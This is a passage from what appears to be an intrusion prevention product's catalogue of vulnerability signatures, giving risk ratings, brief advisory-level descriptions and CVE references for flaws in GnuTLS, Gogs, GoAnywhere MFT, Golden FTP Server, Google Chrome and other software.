https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0092
OSVDB-103933
http://www.osvdb.org/103933
Back to top

GnuTLS-DANE-dane.c-Heap-Buffer-Overflow

About this vulnerability: A GnuTLS DANE dane.c Heap Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GnuTLS
Type: Buffer Overflow
Description: A buffer overflow vulnerability in GnuTLS which allows remote attackers to execute arbitrary code by sending a client more than 4 TLSA records in a DNS response during DANE verification, due to an error in the function dane_query_tlsa() in libdane/dane.c while processing TLSA records.
Situation: DNS-UDP_GnuTLS-DANE-dane.c-Heap-Buffer-Overflow
References:
CVE-2013-4466
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4466
Back to top

GnuTLS-Libtasn1-_ASN1_extract_der_Octet-Memory-Access-Error

About this vulnerability: A vulnerability in GnuTLS libtasn1
Risk: High
First detected in: sgpkg-ips-653-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GnuTLS libtasn1; GnuTLS
Type: Malfunction
Description: A memory access error vulnerability exists in libtasn1, a component of GnuTLS. The vulnerability is due to a flaw in _asn1_extract_der_octet() that causes libtasn1 to read beyond the allocated buffer when processing a specially crafted DER-encoded input. A remote attacker can exploit this vulnerability in GnuTLS by sending a crafted ASN.1 certificate to a target application. Successful exploitation may result in a denial-of-service condition.
Situation: HTTPS_CS-GnuTLS-Libtasn1-_ASN1_extract_der_Octet-Memory-Access-Error
References:
CVE-2015-3622
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3622
BID-74419
http://www.securityfocus.com/bid/74419
Back to top

GnuTLS-Proxy-Certificate-Information-Extension-Memory-Corruption

About this vulnerability: A vulnerability in GnuTLS
Risk: High
First detected in: sgpkg-ips-867-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GnuTLS
Type: Malfunction
Description: There exists a memory corruption vulnerability in the GnuTLS library. A remote attacker can exploit this to execute arbitrary code on the affected system.
Situation: HTTPS_CS-GnuTLS-Proxy-Certificate-Information-Extension-Memory-Corruption
HTTPS_SS-GnuTLS-Proxy-Certificate-Information-Extension-Memory-Corruption
References:
CVE-2017-5334
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5334
Back to top

GnuTLS-Server-Hello-Session-Id-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in GnuTLS GnuTLS
Risk: Moderate
First detected in: sgpkg-ips-590-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GnuTLS
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability has been found in GnuTLS. The vulnerability is due to lack of bounds checking of the Session ID field in a TLS Server Hello message. A remote, unauthenticated attacker can exploit this vulnerability to cause a buffer overflow and achieve arbitrary code execution in an application using a vulnerable version of the GnuTLS library.
Situation: HTTPS_SS-GnuTLS-Server-Hello-Session-Id-Heap-Buffer-Overflow
References:
CVE-2014-3466
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3466
BID-67741
http://www.securityfocus.com/bid/67741
OSVDB-107564
http://www.osvdb.org/107564
Back to top

GnuTLS-Status_request-Extension-Null-Pointer-Dereference

About this vulnerability: A vulnerability in GnuTLS
Risk: High
First detected in: sgpkg-ips-941-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GnuTLS
Type: Malfunction
Description: There exists a denial of service vulnerability in the GnuTLS library.
Situation: HTTPS_CS-GnuTLS-Status_request-Extension-Null-Pointer-Dereference
References:
CVE-2017-7507
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7507
Back to top

GnuTLS-TLS-Record-GenericBlockCipher-Parsing-Integer-Overflow

About this vulnerability: A vulnerability in Free Software Foundation GnuTLS
Risk: High
First detected in: sgpkg-ips-451-4333
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GnuTLS
Type: Integer Overflow
Description: A memory corruption vulnerability has been reported in GnuTLS. The flaw is due to an error in ciphertext_to_compressed() which fails to verify the size of the ciphertext. This vulnerability can cause memory corruption. A remote attacker can exploit this vulnerability by sending a TLS Application Data Packet with a length of 32 bytes (0x20). Successful exploitation may allow the attacker to execute arbitrary code in the context of the service, or crash the target service which uses the library, causing a Denial Of Service condition.
Situation: Generic_CS-GnuTLS-TLS-Record-GenericBlockCipher-Parsing-Integer-Overflow
Generic_UDP-GnuTLS-TLS-Record-GenericBlockCipher-Parsing-Integer-Overflow
HTTPS_CS-GnuTLS-TLS-Record-GenericBlockCipher-Parsing-Integer-Overflow
TLS_CS-GnuTLS-TLS-Record-GenericBlockCipher-Parsing-Integer-Overflow
References:
CVE-2012-1573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1573
OSVDB-80259
http://www.osvdb.org/80259
Back to top

Go-Continuous-Delivery-Pre-Auth-Local-File-Read

About this vulnerability: An attempt to exploit a vulnerability in Go Continuous Delivery detected
Risk: High
First detected in: sgpkg-ips-1403-5242
Last changed: sgpkg-ips-1403-5242
Platform: Generic
Software: Go Continuous Delivery
Type: Malfunction
Description: An attempt to exploit a vulnerability in Go Continuous Delivery detected.
Situation: HTTP_CSU-Go-Continuous-Delivery-Pre-Auth-Local-File-Read
Back to top

GoAhead-Web-Server-Source-Code-Exposure

About this vulnerability: GoAhead Web Server Source Code Exposure
Risk: High
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: GoAhead Webserver
Type: Input Validation
Description: There exists a vulnerability in GoAhead Web Server. A remote attacker can get access to the source code of ASP files due to improper filtering of special characters.
Situation: HTTP_CSU-GoAhead-Web-Server-Source-Code-Exposure
References:
CVE-2002-1603
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1603
BID-9239
http://www.securityfocus.com/bid/9239
OSVDB-13295
http://www.osvdb.org/13295
Back to top

GoAhead-Webserver-Directory-Traversal

About this vulnerability: A vulnerability in GoAhead WebServer
Risk: High
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GoAhead Webserver
Type: Malfunction
Description: There is a directory traversal vulnerability in GoAhead WebServer (embedded by TV-IP201 Internet Camera), which allows an attacker to bypass autorization and to access the admin panel.
Situation: HTTP_CSU-GoAhead-Webserver-Directory-Traversal
References:
BID-5197
http://www.securityfocus.com/bid/5197
Back to top

GoAnywhere-MFT-Authentication-Bypass-CVE-2024-0204

About this vulnerability: A vulnerability in Fortra GoAnywhere MFT
Risk: High
First detected in: sgpkg-ips-1685-5242
Last changed: sgpkg-ips-1685-5242
Platform: Generic
Software: GoAnywhere MFT
Type: Input Validation
Description: An improper access control vulnerability has been reported in Fortra GoAnywhere MFT. The vulnerability is due to improper validation of URIs to the InitialAccountSetup.xhtml endpoint. Successful exploitation could result in an attacker creating an administrator account on the target server, which may allow arbitrary code execution under the security context of the root or SYSTEM account.
Situation: HTTP_CSU-GoAnywhere-MFT-Authentication-Bypass-CVE-2024-0204
References:
CVE-2024-0204
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0204
Back to top

GoAnywhere-MFT-Remote-Code-Execution-CVE-2023-0669

About this vulnerability: A vulnerability in GoAnywhere MFT
Risk: High
First detected in: sgpkg-ips-1554-5242
Last changed: sgpkg-ips-1557-5242
Platform: Generic
Software: GoAnywhere MFT
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in Fortra GoAnywhere MFT. The vulnerability is due to insufficient validation of user-supplied data sent to the License Response Servlet exposed on the administrative interface. A remote, unauthenticated attacker could exploit the vulnerability by sending crafted requests to the target server. Successful exploitation can result in arbitrary code execution under the security context of SYSTEM or root.
Situation: HTTP_CRL-GoAnywhere-MFT-Remote-Code-Execution-CVE-2023-0669
References:
CVE-2023-0669
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0669
Back to top

Gogs-DeleteRepoFile-Internal-File-Deletion-CVE-2024-39931

About this vulnerability: A vulnerability in Gogs
Risk: Moderate
First detected in: sgpkg-ips-1852-5242
Last changed: sgpkg-ips-1852-5242
Platform: Generic
Software: Gogs
Type: Input Validation
Description: Improper validation of the Request-URI in the file deletion handler causes a file deletion vulnerability in Gogs. A successful exploitation allows an attacker to delete files in the .git directory and possibly execute code on the target system.
Situation: HTTP_CSU-Gogs-DeleteRepoFile-Internal-File-Deletion-CVE-2024-39931
References:
CVE-2024-39931
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39931
Back to top

Gogs-File-Upload-Tree_path-Command-Injection

About this vulnerability: A vulnerability in Gogs
Risk: Moderate
First detected in: sgpkg-ips-1462-5242
Last changed: sgpkg-ips-1462-5242
Platform: Generic
Software: Gogs
Type: Input Validation
Description: A command injection vulnerability has been reported in Gogs. The vulnerability is due to improper validation on the tree_path parameter when uploading files to a repository. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server and overwriting the repository configuration file. Successful exploitation will result in arbitrary OS command execution on the target server.
Situation: HTTP_CRL-Gogs-File-Upload-Tree_path-Command-Injection
HTTP_CSH-Gogs-File-Upload-Tree_path-Command-Injection
References:
CVE-2022-0415
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0415
Back to top

Gogs-File-Upload-Tree_path-CVE-2022-2024-Command-Injection

About this vulnerability: A vulnerability in Gogs
Risk: Moderate
First detected in: sgpkg-ips-1570-5242
Last changed: sgpkg-ips-1570-5242
Platform: Generic
Software: Gogs
Type: Input Validation
Description: A command injection vulnerability has been reported in Gogs. The vulnerability is due to improper validation on the tree_path parameter when uploading files to a repository. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server and overwriting the repository configuration file. Successful exploitation will result in arbitrary OS command execution on the target server.
Situation: HTTP_CRL-Gogs-File-Upload-Tree_path-CVE-2022-2024-Command-Injection
References:
CVE-2022-2024
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2024
Back to top

Gogs-Full-Name-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Gogs Gogs
Risk: Moderate
First detected in: sgpkg-ips-1520-5242
Last changed: sgpkg-ips-1520-5242
Platform: Generic
Software: Gogs
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported for Gogs. This vulnerability is due to improper validation of full names. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary script execution on the victim's browser.
Situation: HTTP_CRL-Gogs-Full-Name-Stored-Cross-Site-Scripting
References:
CVE-2022-32174
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32174
Back to top

Gogs-Git-Endpoints-Directory-Traversal

About this vulnerability: A vulnerability in Gogs.
Risk: High
First detected in: sgpkg-ips-1481-5242
Last changed: sgpkg-ips-1481-5242
Platform: Generic
Software: Gogs
Type: Directory Traversal
Description: A vulnerability in Gogs, versions prior to 0.12.9, which allows remote attackers to disclose sensitive information via a directory traversal in Git endpoints.
Situation: HTTP_CSU-Gogs-Git-Endpoints-Directory-Traversal
References:
CVE-2022-1993
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1993
Back to top

Gogs-Git-Hooks-Remote-Code-Execution

About this vulnerability: A vulnerability in Gogs.
Risk: High
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Platform: Unix; Linux; Windows
Software: Gogs
Type: Input Validation
Description: A vulnerability in Gogs, version 0.12.3, which allows remote attackers to execute arbitrary code by setting a post-receive git hook with a payload.
Situation: HTTP_CRL-Gitea-And-Gogs-Git-Hooks-Remote-Code-Execution
References:
CVE-2020-15867
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15867
Back to top

Gogs-Repository-Contents-API-Path-Traversal

About this vulnerability: A vulnerability in Gogs
Risk: Moderate
First detected in: sgpkg-ips-1841-5242
Last changed: sgpkg-ips-1841-5242
Platform: Generic
Software: Gogs
Type: Directory Traversal
Description: A path traversal vulnerability has been reported for Gogs. The vulnerability is due to improper validation of the Request-URI in the Repository Contents API. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successfully exploiting this vulnerability could result in arbitrary file write and, in the worst case, command execution.
Situation: HTTP_CRL-Gogs-Repository-Contents-API-Path-Traversal
References:
CVE-2024-55947
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55947
Back to top

Golden-FTP-Server-Buffer-Overflow

About this vulnerability: Golden FTP Server 1.92 and 4.7 Buffer Overflow
Risk: High
First detected in: sgpkg-ips-647-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Golden FTP Server
Type: Buffer Overflow
Description: A heap based buffer overflow vulnerability in Golden FTP Server 1.92 and 4.7 which allows remote attackers to execute arbitrary code, or cause a denial of service condition, via a long PASS command.
Situation: FTP_CS-Oversized-Pass-With-Suspicious-Argument
References:
CVE-2006-6576
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6576
BID-45957
http://www.securityfocus.com/bid/45957
OSVDB-35951
http://www.osvdb.org/35951
Back to top

Golden-FTP-Server-RNTO-BOF

About this vulnerability: Buffer overflow in Golden FTP server RNTO command
Risk: High
First detected in: sgpkg-ips-23-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Golden FTP Server
Type: Buffer Overflow
Description: Golden FTP server is vulnerable to a buffer overflow. A remote attacker could send a RNTO command to overflow a buffer and execute arbitrary commands with the privileges of the server process.
Situation: FTP_CS-Golden-FTP-Server-RNTO-BOF
References:
CVE-2005-0566
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0566
BID-12333
http://www.securityfocus.com/bid/12333
OSVDB-13139
http://www.osvdb.org/13139
Back to top

Golden-FTP-Server-User-Command-BOF

About this vulnerability: Buffer overflow in Golden FTP server USER command
Risk: High
First detected in: sgpkg-ips-26-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Golden FTP Server
Type: Buffer Overflow
Description: Golden FTP server has a buffer overflow in the USER command handling. A remote attacker could send a long USER command to overflow a buffer and to execute arbitrary code on the server.
Situation: FTP_CS-Golden-FTP-Server-User-Command-BOF
References:
CVE-2005-0634
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0634
BID-12704
http://www.securityfocus.com/bid/12704
OSVDB-14369
http://www.osvdb.org/14369
Back to top

GOM-Player-ActiveX-Control-OpenURL-Method-Buffer-Overflow

About this vulnerability: A vulnerability in GOM Player ActiveX Control
Risk: High
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Gretech Online Movie Player
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Gretech Online Movie (GOM) Player ActiveX control. The vulnerability is due to a lack of input validation when handling arguments of a particular method. A remote attacker can exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation allows arbitrary code injection and execution with the privileges of the currently logged in user.
Situation: HTTP_SS-GOM-Player-ActiveX-Control-OpenURL-Method-Buffer-Overflow
File-Text_GOM-Player-ActiveX-Control-OpenURL-Method-Buffer-Overflow
References:
CVE-2007-5779
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5779
BID-26236
http://www.securityfocus.com/bid/26236
Back to top

GoodTech-SSH-Server-Sftp-Processing-Buffer-Overflow

About this vulnerability: A vulnerability in GoodTech Systems SSH Server
Risk: Moderate
First detected in: sgpkg-ips-437-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GoodTech SSH Server
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in GoodTech SSH Server. The vulnerability is due to a boundary error while handling SFTP commands. A remote attacker can exploit this vulnerability by sending crafted SFTP commands to the target server, potentially causing arbitrary code to be injected and executed in the security context of the service, SYSTEM by default. In a sophisticated attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected service, SYSTEM by default. In an attack case where code injection is not successful, the affected service can terminate abnormally and result in a denial of service condition.
Situation: SSH_GoodTech-SSH-Server-Sftp-Processing-Buffer-Overflow
References:
CVE-2008-4726
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4726
BID-31879
http://www.securityfocus.com/bid/31879
Back to top

GoodTech-Telnet-Administration-Web-Server-BOF

About this vulnerability: Buffer overflow in GoodTech Telnet administration web server
Risk: High
First detected in: sgpkg-ips-23-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: GoodTech Telnet Server
Type: Buffer Overflow
Description: GoodTech Telnet Server's administration web server has a buffer overflow vulnerability. A remote attacker could send an overly long string to the vulnerable server to overflow a buffer and to execute arbitrary code.
Situation: Generic_GoodTech-Telnet-Administration-Web-Server-BOF
References:
CVE-2005-0768
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0768
BID-12815
http://www.securityfocus.com/bid/12815
OSVDB-14806
http://www.osvdb.org/14806
Back to top

Goofygobot-Botnet

About this vulnerability: Goofygobot botnet
Risk: High
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Platform: Linux
Software: <os>
Type: Code Injection
Description: Goofygobot is a worm that infects Linux-based systems.
Situation: Generic_CS-Goofygobot-Linux-Infection-Traffic
Back to top

Google-Android-Browser-Same-Origin-Policy-Bypass

About this vulnerability: A vulnerability in Google Android Browser
Risk: High
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-1296-5242
Platform: Android
Software: Google Android Browser
Type: Malfunction
Description: A policy bypass vulnerability exists in Google Android Browser. The vulnerability is due to a flaw leading to same origin policy bypass. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to open a web page. Successful exploitation can result in disclosure of information about other web pages opened by the user or stored in the browser cache.
Situation: File-Text_Google-Android-Browser-Same-Origin-Policy-Bypass
References:
CVE-2014-6041
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6041
BID-69548
http://www.securityfocus.com/bid/69548
OSVDB-110664
http://www.osvdb.org/110664
Back to top

Google-Apps-Mailto-URI-Argument-Injection

About this vulnerability: A vulnerability in Google Apps
Risk: High
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Google Apps
Type: Input Validation
Description: There is an argument injection vulnerability in Google Apps that can allow execution of arbitrary programs on a vulnerable system. The vulnerability is due to an input validation error in googleapps.exe while parsing the "googleapps.url.mailto:" URI. This can allow remote attackers to run arbitrary programs from a remote location. Successful exploitation would result in execution of arbitrary programs on the vulnerable system with the privileges of the logged in user.
Situation: HTTP_SS-Google-Apps-Mailto-URI-Argument-Injection
File-Text_Google-Apps-Mailto-URI
References:
BID-36581
http://www.securityfocus.com/bid/36581
Back to top

Google-Chrome-And-Apple-Safari-Floating-Styles-Use-After-Free-Code-Execution

About this vulnerability: A vulnerability in WebKit Open Source Project WebKit
Risk: Moderate
First detected in: sgpkg-ips-424-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Chrome; Safari
Type: Malfunction
Description: A code execution vulnerability exists Apple Safari and Google Chrome. The vulnerability is due to a use-after-free condition while handling floating style information. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to visit a malicious web site. This can lead to memory corruption and the possibility of code execution in the context of the affected user. If code execution is unsuccessful, the application may terminate abnormally.
Situation: File-Text_Chrome-Safari-Floating-Styles-Use-After-Free-Code-Execution
References:
CVE-2011-2790
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2790
OSVDB-74240
http://www.osvdb.org/74240
Back to top

Google-Chrome-And-Apple-Safari-Runin-Handling-Use-After-Free

About this vulnerability: A vulnerability in Google Chrome
Risk: Moderate
First detected in: sgpkg-ips-826-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Chrome
Type: Malfunction
Description: There exists a code execution vulnerability in Apple Safari and Google Chrome.
Situation: File-Text_Google-Chrome-And-Apple-Safari-Runin-Handling-Use-After-Free
References:
CVE-2011-3068
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3068
OSVDB-81038
http://www.osvdb.org/81038
Back to top

Google-Chrome-Blink-Buildshadowandinstancetree-Use-After-Free

About this vulnerability: A vulnerability in Google Chrome
Risk: Moderate
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Chrome
Type: Malfunction
Description: A use-after-free vulnerability exists in Google Chrome, blink component. The vulnerability is due to error when building a shadow tree for a &lt;use&gt; element with a direct reference to a disallowed element. A remote attacker could exploit this vulnerability by enticing a user to open a malicious webpage. Successful exploitation could result in code execution in the context of the currently logged in user.
Situation: File-TextId_Google-Chrome-Blink-Buildshadowandinstancetree-Use-After-Free
References:
CVE-2015-1256
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1256
OSVDB-122293
http://www.osvdb.org/122293
Back to top

Google-Chrome-Blink-Imagebitmap-Integer-Overflow

About this vulnerability: A vulnerability in Google Chrome
Risk: Moderate
First detected in: sgpkg-ips-835-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Chrome
Type: Integer Overflow
Description: There is an integer overflow in the ImageBitmap::ImageBitmap function of Google Chrome Blink, which an attacker can use a crafted script to exploit to gain the ability to execute arbitrary code on the target system.
Situation: File-Text_Google-Chrome-Blink-Imagebitmap-Integer-Overflow
References:
CVE-2016-5182
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5182
Back to top

Google-Chrome-Extension-Package

About this vulnerability: Google Chrome browser extension installation package
Risk: Low
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Chrome
Type: Insecure Configuration
Description: Google Chrome is a popular browser. It allows installation of persistent browser extensions and applications that run inside the browser.
Situation: HTTP_SS-Google-Chrome-CRX-Extension-Package-Download
File-Binary_Google-Chrome-CRX-Extension-Package
Back to top

Google-Chrome-FileReader-Use-After-Free-CVE-2019-5786

About this vulnerability: A vulnerability in Google Chrome
Risk: High
First detected in: sgpkg-ips-1146-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Chrome
Type: Use-after-free
Description: There has been reported a use-after-free vulnerability in Google Chrome. Successful exploitation of this vulnerability can lead in remote code execution.
Situation: File-Text_Google-Chrome-FileReader-Use-After-Free-CVE-2019-5786
References:
CVE-2019-5786
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5786
Back to top

Google-Chrome-GURL-Cross-Origin-Bypass

About this vulnerability: A vulnerability in Google Chrome
Risk: Moderate
First detected in: sgpkg-ips-316-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Chrome
Type: Malfunction
Description: There is a cross-origin bypass vulnerability in Google Chrome. The vulnerability is due to insufficient validation of URLs in the Google URL (GURL) component, which can lead to violation of the same origin policy. Remote attackers can exploit this vulnerability by enticing target users to visit a malicious website. Successful exploitation of this vulnerability can result in information disclosure and execution of active content outside the prescribed context.
Situation: HTTP_SS-Google-Chrome-GURL-Cross-Origin-Bypass
File-Text_Google-Chrome-GURL-Cross-Origin-Bypass
References:
CVE-2010-1663
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1663
BID-39813
http://www.securityfocus.com/bid/39813
Back to top

Google-Chrome-Insufficient-Validation-CVE-2021-21220

About this vulnerability: An attempt to exploit a vulnerability in Google Chrome detected
Risk: High
First detected in: sgpkg-ips-1407-5242
Last changed: sgpkg-ips-1407-5242
Platform: Generic
Software: Chrome
Type: Malfunction
Description: An attempt to exploit a vulnerability in Google Chrome detected.
Situation: File-Text_Google-Chrome-Insufficient-Validation-CVE-2021-21220
References:
CVE-2021-21220
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21220
Back to top

Google-Chrome-Locationattributesetter-Use-After-Free

About this vulnerability: A vulnerability in Google Chrome
Risk: Moderate
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Chrome
Type: Malfunction
Description: There exists a use-after-free vulnerability in Google Chrome. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Google-Chrome-Locationattributesetter-Use-After-Free
References:
CVE-2014-1713
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1713
BID-66243
http://www.securityfocus.com/bid/66243
OSVDB-104501
http://www.osvdb.org/104501
Back to top

Google-Chrome-Multiple-File-Type-Security-Bypass

About this vulnerability: A vulnerability in Google Chrome
Risk: Moderate
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Chrome
Type: Malfunction
Description: A security bypass vulnerability exists in Google Chrome. The vulnerability is due to a design weakness within Chrome's automatic download navigation component. A remote attacker could exploit this vulnerability by enticing a target user to visit a malicious web page using the affected application. Successful exploitation could result in execution of arbitrary code on the vulnerable system in the context of the logged-on user.
Situation: File-Text_Google-Chrome-Multiple-File-Type-Security-Bypass
File-TextId_Google-Chrome-Multiple-File-Type-Security-Bypass
Back to top

Google-Chrome-Notifyinstancewasdeleted-Use-After-Free

About this vulnerability: A vulnerability in Google Chrome
Risk: Moderate
First detected in: sgpkg-ips-547-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Chrome
Type: Malfunction
Description: There is a use after free vulnerability in Google Chrome. The vulnerability is due to memory corruption while handling ready state and domcontentloaded events in a web page. A remote attacker could exploit these vulnerabilities by enticing a user to open a malicious web page. Successful exploitation could permit an attacker to execute arbitrary code in the context of the vulnerable application or bypass security restrictions.
Situation: File-Text_Google-Chrome-Notifyinstancewasdeleted-Use-After-Free
References:
CVE-2013-2912
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2912
OSVDB-97972
http://www.osvdb.org/97972
Back to top

Google-Chrome-Object-Lifecycle-Issue

About this vulnerability: An attempt to exploit a vulnerability in Google Chrome detected
Risk: High
First detected in: sgpkg-ips-1407-5242
Last changed: sgpkg-ips-1407-5242
Platform: Generic
Software: Chrome
Type: Malfunction
Description: An attempt to exploit a vulnerability in Google Chrome detected.
Situation: File-Text_Google-Chrome-Object-Lifecycle-Issue
References:
CVE-2021-21166
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21166
Back to top

Google-Chrome-Skia-Integer-Overflow-CVE-2023-6345

About this vulnerability: An attempt to exploit a vulnerability in Google Chrome detected
Risk: High
First detected in: sgpkg-ips-1828-5242
Last changed: sgpkg-ips-1828-5242
Platform: Generic
Software: Chrome
Type: Integer Overflow
Description: An integer overflow vulnerability in Skia in Google Chrome prior to 119.0.6045.199 allows a remote attacker who has compromised the renderer process to potentially perform a sandbox escape via a malicious file.
Situation: File-Binary_Google-Chrome-Skia-Integer-Overflow-CVE-2023-6345
References:
CVE-2023-6345
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6345
Back to top

Google-Chrome-Stale-Pointer-In-Floats-Rendering-Memory-Corruption

About this vulnerability: A vulnerability in Google Chrome
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Chrome
Type: Malfunction
Description: A vulnerability has been identified in Google Chrome. This vulnerability is due to the use of a stale pointer in rendering floats. A remote attacker may exploit this vulnerability by enticing a target user to view a malicious web page. Successful exploitation of this vulnerability could result in the execution of arbitrary code in the security context of the user. An unsuccessful attack may result in abnormal termination of the software.
Situation: File-Text_Google-Chrome-Stale-Pointer-In-Floats-Rendering-Memory-Corruption
References:
CVE-2011-1804
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1804
BID-47965
http://www.securityfocus.com/bid/47965
Back to top

Google-Chrome-Type-Confusion-CVE-2020-6418

About this vulnerability: An attempt to exploit a vulnerability in Google Chrome detected
Risk: High
First detected in: sgpkg-ips-1407-5242
Last changed: sgpkg-ips-1407-5242
Platform: Generic
Software: Chrome
Type: Malfunction
Description: An attempt to exploit a vulnerability in Google Chrome detected.
Situation: File-Text_Google-Chrome-Type-Confusion-CVE-2020-6418
References:
CVE-2020-6418
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6418
Back to top

Google-Chrome-Type-Confusion-CVE-2021-21224

About this vulnerability: An attempt to exploit a vulnerability in Google Chrome detected
Risk: High
First detected in: sgpkg-ips-1407-5242
Last changed: sgpkg-ips-1407-5242
Platform: Generic
Software: Chrome
Type: Malfunction
Description: An attempt to exploit a vulnerability in Google Chrome detected.
Situation: File-Text_Google-Chrome-Type-Confusion-CVE-2021-21224
References:
CVE-2021-21224
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21224
Back to top

Google-Chrome-Type-Confusion-CVE-2021-30563

About this vulnerability: An attempt to exploit a vulnerability in Google Chrome detected
Risk: High
First detected in: sgpkg-ips-1408-5242
Last changed: sgpkg-ips-1408-5242
Platform: Generic
Software: Chrome
Type: Malfunction
Description: An attempt to exploit a vulnerability in Google Chrome detected.
Situation: File-Text_Google-Chrome-Type-Confusion-CVE-2021-30563
References:
CVE-2021-30563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30563
Back to top

Google-Chrome-Type-Confusion-CVE-2022-1096

About this vulnerability: A vulnerability in Google Chrome
Risk: High
First detected in: sgpkg-ips-1795-5242
Last changed: sgpkg-ips-1795-5242
Platform: Generic
Software: Chrome
Type: Type Confusion
Description: A type confusion vulnerability has been reported in the V8 component of Google Chrome versions prior to 99.0.4844.84.
Situation: File-Text_Google-Chrome-Type-Confusion-CVE-2022-1096
References:
CVE-2022-1096
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1096
Back to top

Google-Chrome-Type-Confusion-CVE-2022-4262

About this vulnerability: A vulnerability in Google Chrome
Risk: High
First detected in: sgpkg-ips-1658-5242
Last changed: sgpkg-ips-1658-5242
Platform: Generic
